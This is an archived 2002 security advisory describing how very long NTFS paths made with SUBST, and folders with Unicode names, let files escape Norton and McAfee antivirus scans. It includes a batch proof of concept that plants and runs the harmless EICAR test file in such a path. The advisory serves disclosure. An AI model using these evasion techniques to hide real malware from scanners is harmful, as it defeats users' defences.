Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows :: win5048.htm

Windows long pathnames/Unicode may be exploited to hide files such as virus



30th Jan 2002 [SBWID-5048]
COMMAND

	Windows long pathnames/Unicode may be exploited to hide  files  such  as
	virus

SYSTEMS AFFECTED

	 Windows NT 4.0 SP4

	 Windows NT 4.0 SP6a

	 Windows 2000 Professional SP2

	 Windows XP Pro

	

	Tested with :
	

	 Norton AntiVirus 5.0

	 Norton AntiVirus 7.5.1

	 Norton Antivirus 8.00.58

PROBLEM

	In Hans Somers post :
	

	The filesystem NTFS seems to be a hiding place for virusses if  you  use
	a file path which exceeds 256 charaters.
	

	The filepath (drive + folderpath + filename) theoraticly can take up  to
	32000 charaters if the filesystem in use is NTFS. However,  the  way  in
	wich Windows access this filesystem a maximum of 256  characters  is  in
	place. If you try to go deeper, you will experience a \"Path too  long\"
	error. In these Operating System there is a way  to  substitute  a  long
	folderpath, using the \"SUBST\" command.  If  you  change  your  current
	drive to the substituted drive, the  pathlength  is  reset  to  3  (Q:\\
	e.g.) and Windows NT allows you to create an even deeper path.
	

	Normally this would not alarm anyone,  however,  i  discovered  that  my
	favorite virusscanner (Norton AntiVirus) was  not  able  to  follow  the
	deep path where i created the EICAR-test string. So  i  created  a  very
	simple batchfile to demonstrate this exploit. My virusscanner will  only
	find this virus is the SUBST drive is availible during the scan.
	

	After running the script below, remove the substituted drive  (SUBST  Q:
	/D) and run a  full  scan  on  your  C-partition.  I  suspect  that  the
	Eicar-virus will not be found. Additionally, re-create  the  substituted
	drive and re-run the scan. Under normal conditions the Eicar-virus  will
	be found and removed(depending on your settings).
	

	 Sample script:

	 =============

	

	@echo off

	cls

	echo Start test-script NTFS-limit

	@echo Create a filepath to the limit of NTFS

	md c:\\temp\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\123456789

	cd c:\\temp\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\123456789

	

	@echo Create the Eicar test-string for PoC. This should be detected normally if you have an active virusscanner.

	

	echo X5O!P%%@AP[4\\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > EICAR.TXT

	echo. >>EICAR.TXT

	@echo Activate the Eicar test-string

	copy EICAR.TXT EICAR1.COM >NUL

	@echo Create a subst-drive Q: for this path

	subst Q: c:\\temp\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\123456789

	@echo Create e even deeper filepath (thus exceeding the limit of NTFS\'s explorer)

	md Q:\\1234567890\\1234567890\\1234567890

	@echo Change current folder into \"the deep\"

	Q:

	cd Q:\\1234567890\\1234567890\\1234567890

	@echo Create the Eicar test-string

	echo X5O!P%%@AP[4\\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > EICAR.TXT

	echo. >>EICAR.TXT 

	@echo Activate the Eicar test-string

	copy EICAR.TXT EICAR2.COM >NUL

	EICAR2.COM

	echo .

	echo End of test-script

	

	

	 Update (07 Februray 2002)

	 ======

	

	Christophe Bousquet added :
	

	Actually, you don\'t have to deal with long path name.
	

	Here\'s a little experiment I\'ve just done :
	

	- a file with something that triggers my MacAfee VirusScan  NT,  put  it
	in
	  folder \"Hello\". Start scan : no problem, VirusScan warns me about

	  the dangerous thing.

	

	- same file, in folder called \"nihongo\", but labeled using japanese
	  characters i.e. a folder with a unicode name. Start scan : nothing!

	  No warning, because (i guess) no scan at all.

	

SOLUTION

	None yet


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH